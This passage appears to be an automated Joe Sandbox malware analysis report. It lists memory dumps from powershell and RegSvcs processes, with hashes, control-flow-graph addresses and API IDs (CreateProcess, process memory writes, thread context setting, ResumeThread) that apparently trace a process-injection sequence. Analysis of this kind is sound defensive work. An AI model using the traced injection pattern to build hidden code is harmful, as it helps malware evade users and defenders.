                                      • Opcode ID: 52b5a0cd687f1122be8bc2c8e86c008f0b59b5f2e67a3f6a36ff944c00936bee
                                      • Instruction ID: 9d534104459e17263bbb1a93af9793ab4cd8c00ed73579cd3cd341cc35aac1e6
                                      • Opcode Fuzzy Hash: 52b5a0cd687f1122be8bc2c8e86c008f0b59b5f2e67a3f6a36ff944c00936bee
                                      • Instruction Fuzzy Hash: F792F121E0EAC94FE7AAB72858296B57FE1FF56250F0801FBD04DC71D3DA289C468356

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 292 7ff848e20f5b-7ff848e20f62 293 7ff848e20fac-7ff848e20fc0 292->293 294 7ff848e20f64-7ff848e20f99 292->294 301 7ff848e20fc2-7ff848e20fc7 293->301 299 7ff848e210e8-7ff848e21115 294->299 300 7ff848e20f9f-7ff848e20fa9 294->300 312 7ff848e2112a-7ff848e21197 299->312 313 7ff848e21117-7ff848e21128 299->313 300->301 302 7ff848e20fab 300->302 303 7ff848e20fcd-7ff848e20fd0 301->303 304 7ff848e21085-7ff848e2108f 301->304 302->293 306 7ff848e21019 303->306 307 7ff848e20fd2-7ff848e20fe5 303->307 309 7ff848e21091-7ff848e2109f 304->309 310 7ff848e210a0-7ff848e210e5 304->310 314 7ff848e2101b-7ff848e2101d 306->314 307->299 321 7ff848e20feb-7ff848e20ff5 307->321 310->299 343 7ff848e21199 312->343 344 7ff848e2119e-7ff848e211af 312->344 313->312 314->304 318 7ff848e2101f-7ff848e21022 314->318 318->304 319 7ff848e21024-7ff848e2102a 318->319 323 7ff848e21049-7ff848e2105c 319->323 324 7ff848e2102c-7ff848e21047 319->324 325 7ff848e2100e-7ff848e21017 321->325 326 7ff848e20ff7-7ff848e21004 321->326 335 7ff848e2105e-7ff848e2106b 323->335 336 7ff848e21075-7ff848e21084 323->336 324->323 325->314 326->325 332 7ff848e21006-7ff848e2100c 326->332 332->325 335->336 340 7ff848e2106d-7ff848e21073 335->340 340->336 343->344 345 7ff848e2119b 343->345 346 7ff848e211b1 344->346 347 7ff848e211b6-7ff848e211ec 344->347 345->344 346->347 348 7ff848e211b3 346->348 350 7ff848e211ff-7ff848e21203 347->350 351 7ff848e211ee-7ff848e211f4 347->351 348->347 352 7ff848e21207-7ff848e2124f 350->352 351->352 353 7ff848e211f6-7ff848e211fd 351->353 356 7ff848e213e9-7ff848e21418 352->356 357 7ff848e21255-7ff848e2125f 352->357 353->350 371 7ff848e2142a-7ff848e21495 356->371 372 7ff848e2141a-7ff848e21428 356->372 358 7ff848e21279-7ff848e2127f 357->358 359 7ff848e21261-7ff848e2126f 357->359 362 7ff848e2137e-7ff848e21388 358->362 363 7ff848e21285-7ff848e21288 358->363 359->358 365 7ff848e21271-7ff848e21277 359->365 366 7ff848e2139b-7ff848e213e6 362->366 367 7ff848e2138a-7ff848e2139a 362->367 368 7ff848e2128a-7ff848e2129d 363->368 369 7ff848e212d1 363->369 365->358 366->356 368->356 379 7ff848e212a3-7ff848e212ad 368->379 370 7ff848e212d3-7ff848e212d5 369->370 370->362 374 7ff848e212db-7ff848e212de 370->374 405 7ff848e214a1-7ff848e214ad 371->405 406 7ff848e21497-7ff848e2149d 371->406 372->371 374->362 380 7ff848e212e4-7ff848e212e7 374->380 383 7ff848e212af-7ff848e212c4 379->383 384 7ff848e212c6-7ff848e212cf 379->384 380->362 385 7ff848e212ed-7ff848e212f9 380->385 383->384 384->370 390 7ff848e212fb-7ff848e2132b 385->390 391 7ff848e21332-7ff848e21333 385->391 390->362 404 7ff848e2132d-7ff848e21331 390->404 392 7ff848e21352-7ff848e21368 391->392 393 7ff848e21335-7ff848e21350 391->393 399 7ff848e2136e-7ff848e2137d 392->399 393->392 404->391 407 7ff848e214b9-7ff848e21534 405->407 408 7ff848e214af-7ff848e214b5 405->408 406->405 410 7ff848e2157b-7ff848e21585 407->410 411 7ff848e21536-7ff848e21578 407->411 408->407 412 7ff848e21590-7ff848e215db 410->412 413 7ff848e21587-7ff848e2158f 410->413 411->410
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3350608551.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848e20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26b4829c5681b59c2103e8b2e4cf92c5fbd8bf0885c3c54a3989daeb60170dae
                                      • Instruction ID: 356da2ce061124a3fe8b3655dc468bc9c1ed4a7433df3eada5b04939f4f6e7c2
                                      • Opcode Fuzzy Hash: 26b4829c5681b59c2103e8b2e4cf92c5fbd8bf0885c3c54a3989daeb60170dae
                                      • Instruction Fuzzy Hash: B8323631A0EBC94FE39AAB6858555B47BE1FF46360F0901FBD04DC7193DA29AC06C396

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3335308466.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848d50000_powershell.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 457d425c312f76d5e431a75a7468f72bb0f8c77017fd6ecc76b4b1cb2167036a
                                      • Instruction ID: 47543cabe3d5f38991621d339be648ffa318e8684a66919f8001859e9c356d96
                                      • Opcode Fuzzy Hash: 457d425c312f76d5e431a75a7468f72bb0f8c77017fd6ecc76b4b1cb2167036a
                                      • Instruction Fuzzy Hash: D2F17B7090DA998FDB99DF18C864BE9BBF0EF26310F1500EEC049E7292DB745985CB45

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3335308466.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848d50000_powershell.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 78e3f4ef9228898efc176b64aff08ff68833c9827d4cde747a47b20c3001510b
                                      • Instruction ID: 1265c0cfc29caf734ff8488f57e7b19ea97e8ac3d4f7d00b9f9bc96aebd0c970
                                      • Opcode Fuzzy Hash: 78e3f4ef9228898efc176b64aff08ff68833c9827d4cde747a47b20c3001510b
                                      • Instruction Fuzzy Hash: 58613270909A5D8FDB98DF58C884BE9BBF1FB69310F1041AED04DE3691CB74A985CB44

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3335308466.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848d50000_powershell.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 51fcef2ea819fc9d0a8caf72d95e2aa1eb86529d505a4ad9b960b0716b8a371b
                                      • Instruction ID: 1dd5f4e2cba368b7b2ef1ed272273a4bdac9dd9b086c051be45360741519485b
                                      • Opcode Fuzzy Hash: 51fcef2ea819fc9d0a8caf72d95e2aa1eb86529d505a4ad9b960b0716b8a371b
                                      • Instruction Fuzzy Hash: 4151BF70D0964D8FDB45DF98C884BE9BBF1FB66310F1082AAD048D7256C7749489CF90

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3335308466.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848d50000_powershell.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: ed9d0836775059314e7b26284ff86a17af522da3b5ecbdf4edbbcf387c56886d
                                      • Instruction ID: 8ccaba723cf28de930e77020ca00fac68a0f1dd734e41ffcb6cd4a69fdf2304f
                                      • Opcode Fuzzy Hash: ed9d0836775059314e7b26284ff86a17af522da3b5ecbdf4edbbcf387c56886d
                                      • Instruction Fuzzy Hash: F0416930D0DB4C8FDB59DF98D885BA9BBF0FB5A310F1041AED049E7252DA74A885CB51

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 470 7ff848e209e8-7ff848e20a32 472 7ff848e20a7c-7ff848e20a83 470->472 473 7ff848e20a34-7ff848e20a3a 470->473 478 7ff848e20a8d-7ff848e20a92 472->478 479 7ff848e20a85-7ff848e20a8b 472->479 476 7ff848e20a3c-7ff848e20a64 473->476 477 7ff848e20a84-7ff848e20a8b 473->477 483 7ff848e20b89-7ff848e20c39 476->483 484 7ff848e20a6a-7ff848e20a74 476->484 477->478 481 7ff848e20a98-7ff848e20a9b 478->481 482 7ff848e20b2a-7ff848e20b34 478->482 479->478 481->482 488 7ff848e20aa1-7ff848e20aa4 481->488 485 7ff848e20b43-7ff848e20b86 482->485 486 7ff848e20b36-7ff848e20b42 482->486 520 7ff848e20c3b 483->520 521 7ff848e20c3c-7ff848e20c4d 483->521 484->478 490 7ff848e20a76-7ff848e20a77 484->490 485->483 492 7ff848e20acb-7ff848e20acc 488->492 493 7ff848e20aa6-7ff848e20ac9 488->493 490->472 495 7ff848e20acd-7ff848e20acf 492->495 493->495 495->482 498 7ff848e20ad1-7ff848e20adb 495->498 498->482 506 7ff848e20add-7ff848e20aeb 498->506 509 7ff848e20aca 506->509 510 7ff848e20aed-7ff848e20af3 506->510 509->492 512 7ff848e20afa-7ff848e20b03 510->512 513 7ff848e20b1c-7ff848e20b29 512->513 514 7ff848e20b05-7ff848e20b12 512->514 514->513 517 7ff848e20b14-7ff848e20b1a 514->517 517->513 520->521 522 7ff848e20c4f 521->522 523 7ff848e20c50-7ff848e20c88 521->523 522->523 525 7ff848e20c8a-7ff848e20c93 523->525 526 7ff848e20c95-7ff848e20ce9 523->526 525->526 529 7ff848e20e3b-7ff848e20eeb 526->529 530 7ff848e20cef-7ff848e20cf9 526->530 573 7ff848e20eed 529->573 574 7ff848e20ef2-7ff848e20f03 529->574 531 7ff848e20cfb-7ff848e20d10 530->531 532 7ff848e20d12-7ff848e20d17 530->532 531->532 535 7ff848e20dd8-7ff848e20de2 532->535 536 7ff848e20d1d-7ff848e20d20 532->536 538 7ff848e20df3-7ff848e20e38 535->538 539 7ff848e20de4-7ff848e20df2 535->539 540 7ff848e20d69 536->540 541 7ff848e20d22-7ff848e20d35 536->541 538->529 544 7ff848e20d6b-7ff848e20d6d 540->544 541->529 552 7ff848e20d3b-7ff848e20d45 541->552 544->535 547 7ff848e20d6f-7ff848e20d72 544->547 547->535 550 7ff848e20d74-7ff848e20d7a 547->550 553 7ff848e20d99-7ff848e20daf 550->553 554 7ff848e20d7c-7ff848e20d97 550->554 555 7ff848e20d5e-7ff848e20d67 552->555 556 7ff848e20d47-7ff848e20d54 552->556 565 7ff848e20dc8-7ff848e20dd7 553->565 566 7ff848e20db1-7ff848e20dbe 553->566 554->553 555->544 556->555 562 7ff848e20d56-7ff848e20d5c 556->562 562->555 566->565 570 7ff848e20dc0-7ff848e20dc6 566->570 570->565 573->574 577 7ff848e20eef 573->577 575 7ff848e20f0a-7ff848e20f44 574->575 576 7ff848e20f05 574->576 576->575 578 7ff848e20f07 576->578 577->574 578->575
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3350608551.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848e20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62fd22f83e29f690506bf8ecab8dcaa8b973316ef6ca4fd448e677f39e2848a2
                                      • Instruction ID: ebca2240f3e45c2c333deb38ede8e2de95cd698e99adc978b674cc7f922777fe
                                      • Opcode Fuzzy Hash: 62fd22f83e29f690506bf8ecab8dcaa8b973316ef6ca4fd448e677f39e2848a2
                                      • Instruction Fuzzy Hash: 8A412222D1EA8A4FE366B72818292757FE0FF52394F4D41FAC04CC70E3EA289C058756

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 599 7ff848e204ea-7ff848e204f6 601 7ff848e205fa-7ff848e20604 599->601 602 7ff848e204fc-7ff848e20533 599->602 604 7ff848e20613-7ff848e20629 601->604 605 7ff848e20606-7ff848e20612 601->605 612 7ff848e20535-7ff848e20555 602->612 613 7ff848e20557 602->613 609 7ff848e2062d-7ff848e20697 604->609 625 7ff848e20699-7ff848e20709 609->625 615 7ff848e20559-7ff848e2055b 612->615 613->615 615->601 617 7ff848e20561-7ff848e20564 615->617 617->601 618 7ff848e2056a-7ff848e205a4 617->618 630 7ff848e205c0-7ff848e205c3 618->630 631 7ff848e205a6-7ff848e205be 618->631 643 7ff848e2070b 625->643 644 7ff848e2070c-7ff848e2071d 625->644 635 7ff848e205ca-7ff848e205d3 630->635 631->630 637 7ff848e205ec-7ff848e205f9 635->637 638 7ff848e205d5-7ff848e205e2 635->638 638->637 641 7ff848e205e4-7ff848e205ea 638->641 641->637 643->644 646 7ff848e2071f 644->646 647 7ff848e20720-7ff848e20782 644->647 646->647 650 7ff848e207cc-7ff848e207e1 647->650 651 7ff848e20784-7ff848e207b7 647->651 658 7ff848e207e3-7ff848e207f0 650->658 655 7ff848e207bd-7ff848e207c7 651->655 656 7ff848e2090f-7ff848e209c1 651->656 655->658 659 7ff848e207c9-7ff848e207ca 655->659 692 7ff848e209c3 656->692 693 7ff848e209c4-7ff848e209d5 656->693 663 7ff848e208b0-7ff848e208ba 658->663 664 7ff848e207f6-7ff848e207f9 658->664 659->650 668 7ff848e208c9-7ff848e2090c 663->668 669 7ff848e208bc-7ff848e208c8 663->669 664->663 666 7ff848e207ff-7ff848e20807 664->666 666->656 670 7ff848e2080d-7ff848e20817 666->670 668->656 673 7ff848e20819-7ff848e2082e 670->673 674 7ff848e20830-7ff848e20834 670->674 673->674 674->663 676 7ff848e20836-7ff848e20839 674->676 679 7ff848e2083b-7ff848e20844 676->679 680 7ff848e20850-7ff848e20854 676->680 679->680 680->663 685 7ff848e20856-7ff848e2085c 680->685 686 7ff848e2087b-7ff848e20889 685->686 687 7ff848e2085e-7ff848e20879 685->687 694 7ff848e2088b-7ff848e20898 686->694 695 7ff848e208a2-7ff848e208af 686->695 687->686 692->693 697 7ff848e209d8-7ff848e20a32 693->697 698 7ff848e209d7 693->698 694->695 701 7ff848e2089a-7ff848e208a0 694->701 702 7ff848e20a7c-7ff848e20a83 697->702 703 7ff848e20a34-7ff848e20a3a 697->703 698->697 701->695 709 7ff848e20a8d-7ff848e20a92 702->709 710 7ff848e20a85-7ff848e20a8b 702->710 707 7ff848e20a3c-7ff848e20a64 703->707 708 7ff848e20a84-7ff848e20a8b 703->708 714 7ff848e20b89-7ff848e20c39 707->714 715 7ff848e20a6a-7ff848e20a74 707->715 708->709 712 7ff848e20a98-7ff848e20a9b 709->712 713 7ff848e20b2a-7ff848e20b34 709->713 710->709 712->713 719 7ff848e20aa1-7ff848e20aa4 712->719 716 7ff848e20b43-7ff848e20b86 713->716 717 7ff848e20b36-7ff848e20b42 713->717 751 7ff848e20c3b 714->751 752 7ff848e20c3c-7ff848e20c4d 714->752 715->709 721 7ff848e20a76-7ff848e20a77 715->721 716->714 723 7ff848e20acb-7ff848e20acc 719->723 724 7ff848e20aa6-7ff848e20ac9 719->724 721->702 726 7ff848e20acd-7ff848e20acf 723->726 724->726 726->713 729 7ff848e20ad1-7ff848e20adb 726->729 729->713 737 7ff848e20add-7ff848e20aeb 729->737 740 7ff848e20aca 737->740 741 7ff848e20aed-7ff848e20af3 737->741 740->723 743 7ff848e20afa-7ff848e20b03 741->743 744 7ff848e20b1c-7ff848e20b29 743->744 745 7ff848e20b05-7ff848e20b12 743->745 745->744 748 7ff848e20b14-7ff848e20b1a 745->748 748->744 751->752 753 7ff848e20c4f 752->753 754 7ff848e20c50-7ff848e20c88 752->754 753->754 756 7ff848e20c8a-7ff848e20c93 754->756 757 7ff848e20c95-7ff848e20ce9 754->757 756->757 760 7ff848e20e3b-7ff848e20eeb 757->760 761 7ff848e20cef-7ff848e20cf9 757->761 804 7ff848e20eed 760->804 805 7ff848e20ef2-7ff848e20f03 760->805 762 7ff848e20cfb-7ff848e20d10 761->762 763 7ff848e20d12-7ff848e20d17 761->763 762->763 766 7ff848e20dd8-7ff848e20de2 763->766 767 7ff848e20d1d-7ff848e20d20 763->767 769 7ff848e20df3-7ff848e20e38 766->769 770 7ff848e20de4-7ff848e20df2 766->770 771 7ff848e20d69 767->771 772 7ff848e20d22-7ff848e20d35 767->772 769->760 775 7ff848e20d6b-7ff848e20d6d 771->775 772->760 783 7ff848e20d3b-7ff848e20d45 772->783 775->766 778 7ff848e20d6f-7ff848e20d72 775->778 778->766 781 7ff848e20d74-7ff848e20d7a 778->781 784 7ff848e20d99-7ff848e20daf 781->784 785 7ff848e20d7c-7ff848e20d97 781->785 786 7ff848e20d5e-7ff848e20d67 783->786 787 7ff848e20d47-7ff848e20d54 783->787 796 7ff848e20dc8-7ff848e20dd7 784->796 797 7ff848e20db1-7ff848e20dbe 784->797 785->784 786->775 787->786 793 7ff848e20d56-7ff848e20d5c 787->793 793->786 797->796 801 7ff848e20dc0-7ff848e20dc6 797->801 801->796 804->805 808 7ff848e20eef 804->808 806 7ff848e20f0a-7ff848e20f44 805->806 807 7ff848e20f05 805->807 807->806 809 7ff848e20f07 807->809 808->805 809->806
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3350608551.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848e20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a2fd1f674dd75ac3bd0fe7f4f2efe294779a641179b2051940239826acab82ed
                                      • Instruction ID: 30ca7c8483f44ccd10fc286527399f3a2a42cc4b42055558637560e088783b5e
                                      • Opcode Fuzzy Hash: a2fd1f674dd75ac3bd0fe7f4f2efe294779a641179b2051940239826acab82ed
                                      • Instruction Fuzzy Hash: 3A31C022E5FA8A4FF6BA762C186527866D1FF456E1F4800BAE40EC31D3DE2C9844031A
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3190149583.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ff848d40000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 320083362ff710e66205d565ba03e3f6ccf15de72058ad0e917008679ec5b948
                                      • Instruction ID: 605cdf31a417e2c362c7497bce3c6d48c23603517bbc96be218f8812cea65701
                                      • Opcode Fuzzy Hash: 320083362ff710e66205d565ba03e3f6ccf15de72058ad0e917008679ec5b948
                                      • Instruction Fuzzy Hash: 4F323732A0E5598FEB44FB6CE491AF977A1FF55364F04017AD04DC7193CB24A886C7A4
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3204340140.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ff848e10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b09031dc544a798a3554b92c0627863dbb011cf4b00ffafbec8a2945a8d494e6
                                      • Instruction ID: 8f21d31ef243fe19b5336a10144fd72f33bd0a738eadba587eae0cef68e53dad
                                      • Opcode Fuzzy Hash: b09031dc544a798a3554b92c0627863dbb011cf4b00ffafbec8a2945a8d494e6
                                      • Instruction Fuzzy Hash: AAD12531D0EA8A5FE799EB2C58555B67BE1FF06390F0801FAD44DC7193DB28A805C365
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3190149583.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ff848d40000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 653baa26f6b4173d3c8105acc61fe923c4664836f7210216aac371227cbc2930
                                      • Instruction ID: 8777440b4a0a0a13e7860ad83c605e06cf1c7cb97f3b2b06e624b7c97ad1ca3f
                                      • Opcode Fuzzy Hash: 653baa26f6b4173d3c8105acc61fe923c4664836f7210216aac371227cbc2930
                                      • Instruction Fuzzy Hash: FC21917290E7C14FE347A76CA8A5AE13FA0EF43674F0901E7D099CB0A3D519184BC369
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3190149583.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ff848d40000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c97eb58c76ab628996e3617ddc048fdde98264560ca4b81bbdf52808bed74b2
                                      • Instruction ID: 7766777e28edd163c1e8f0dbfbc8b45073e432c44d17e220c447997faba37ff5
                                      • Opcode Fuzzy Hash: 0c97eb58c76ab628996e3617ddc048fdde98264560ca4b81bbdf52808bed74b2
                                      • Instruction Fuzzy Hash: DC01843010CB084FD748EF0CE051AB5B3E0FB85360F10056DE58AC3651DB26E881CB45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (aq$Te]q
                                      • API String ID: 0-2961548996
                                      • Opcode ID: 3c50c666cbda1eda4abc988b563f3fd615d8e4355bda27dcb83a70ccd114babc
                                      • Instruction ID: 19a855de37cc4fb95e77d0256defb0f8bfaa285bc9e03dae9aa8b55edc66a387
                                      • Opcode Fuzzy Hash: 3c50c666cbda1eda4abc988b563f3fd615d8e4355bda27dcb83a70ccd114babc
                                      • Instruction Fuzzy Hash: BE517B70B105148FC754DF6DC498AAEBBF2FF88710F2581AAE406DB3A5CB359C028B80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Haq$dLcq
                                      • API String ID: 0-1713614415
                                      • Opcode ID: 8d24fb4cf4f50a52dbcac138cee7161bfc309d3362964434ae6e99baf56f4a58
                                      • Instruction ID: 22cc5172228df31a5711d6af0915b6a4a45ab6dd18f69871e111d5e8567281e3
                                      • Opcode Fuzzy Hash: 8d24fb4cf4f50a52dbcac138cee7161bfc309d3362964434ae6e99baf56f4a58
                                      • Instruction Fuzzy Hash: 1141AD307002048FDB19DF69D454AAEBBF6FF89310F1485AAE006EB3A5CB789D05CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LR]q
                                      • API String ID: 0-3081347316
                                      • Opcode ID: 4bc0b3bde4161c3675a1fba61b2f3a57ecd38324ee58ac2dd74fd918e1018651
                                      • Instruction ID: 67e493299b2577bbfc144edf57272131aa1f94de5f27b7347e7af52e8e600c50
                                      • Opcode Fuzzy Hash: 4bc0b3bde4161c3675a1fba61b2f3a57ecd38324ee58ac2dd74fd918e1018651
                                      • Instruction Fuzzy Hash: 56518C70B002059FCB14DFBE859466EBBF6FF88710F2484A9D44ADB355DA34DD428B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dLcq
                                      • API String ID: 0-2236789282
                                      • Opcode ID: 44240894681da39be8c8a927f49630917693e43a5664e4432e287198d85451b1
                                      • Instruction ID: 627b1671aa12b103b39d0158d65c36cd754e2acc511c8e97aa1197b789d3479a
                                      • Opcode Fuzzy Hash: 44240894681da39be8c8a927f49630917693e43a5664e4432e287198d85451b1
                                      • Instruction Fuzzy Hash: BF318F71A002048FDB24DF69D554AAEBBF2FF88310F14856AE401AB3A1CB75DD45CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: lqbq
                                      • API String ID: 0-1968102735
                                      • Opcode ID: 96025cfd0f533bd097410d5ffe7bd79caccdad837b82ba1fac22e2bd5f383920
                                      • Instruction ID: 67408e42a03c6b704279b3fd04a9d86bf3803743f2de508a69f2221fe0b7b321
                                      • Opcode Fuzzy Hash: 96025cfd0f533bd097410d5ffe7bd79caccdad837b82ba1fac22e2bd5f383920
                                      • Instruction Fuzzy Hash: 1E218C70A00206CFDB25DF78D544AAE3BF6BF89305F640868D40AEB395DB399D42CB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: lqbq
                                      • API String ID: 0-1968102735
                                      • Opcode ID: c53a67b37484e78a35a773b421cc51697a3be701236ad6d00c64059ad72ebc2c
                                      • Instruction ID: bde56cfb81d04a32968fc70e1ec8211a9826fdba6073b0cfb9e71d36dc76521e
                                      • Opcode Fuzzy Hash: c53a67b37484e78a35a773b421cc51697a3be701236ad6d00c64059ad72ebc2c
                                      • Instruction Fuzzy Hash: CB11AC3060020A8FD724EB79D554A6E3AE7BF88201F600868D006EB394DF399D41CB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Haq
                                      • API String ID: 0-725504367
                                      • Opcode ID: c96f2cdb86444e78aaadfb160f7d710a6b677ce7966bed9f17d705359aa000c4
                                      • Instruction ID: 895c3a8c5da567e7829ac11d39b79a32201382b55877c21847a8c6f111b29f3c
                                      • Opcode Fuzzy Hash: c96f2cdb86444e78aaadfb160f7d710a6b677ce7966bed9f17d705359aa000c4
                                      • Instruction Fuzzy Hash: B10181307442518FC3499F3994545AE7BE6EFD622031645EAD149CB3A6DE288C078791
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e34d7445f674193158712570b4e8bfb838f002148df03f23d28bee46e1fdab6
                                      • Instruction ID: d69eda997b8cdb5a059c3c45024a94e0cd4b96dcf2522d0f063037574c1d7495
                                      • Opcode Fuzzy Hash: 0e34d7445f674193158712570b4e8bfb838f002148df03f23d28bee46e1fdab6
                                      • Instruction Fuzzy Hash: 5C51E270200209DFC72AEF25F5449593B7AFB843173518668D8168B238DB3DADCADF88
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf13d70ff0a9d2025c0c118d5d6750b6416463e0ccf6ef8aefd090be7c39153f
                                      • Instruction ID: 16da764b11933d4d65c4c31a93213681ab22310508b5c4ef44007006caa1613f
                                      • Opcode Fuzzy Hash: bf13d70ff0a9d2025c0c118d5d6750b6416463e0ccf6ef8aefd090be7c39153f
                                      • Instruction Fuzzy Hash: 2D312F307102129FDB749F7D981827E3AA5BF50246F445639F907CA1D5EAB48981CB52
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.2382399863.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_15d0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
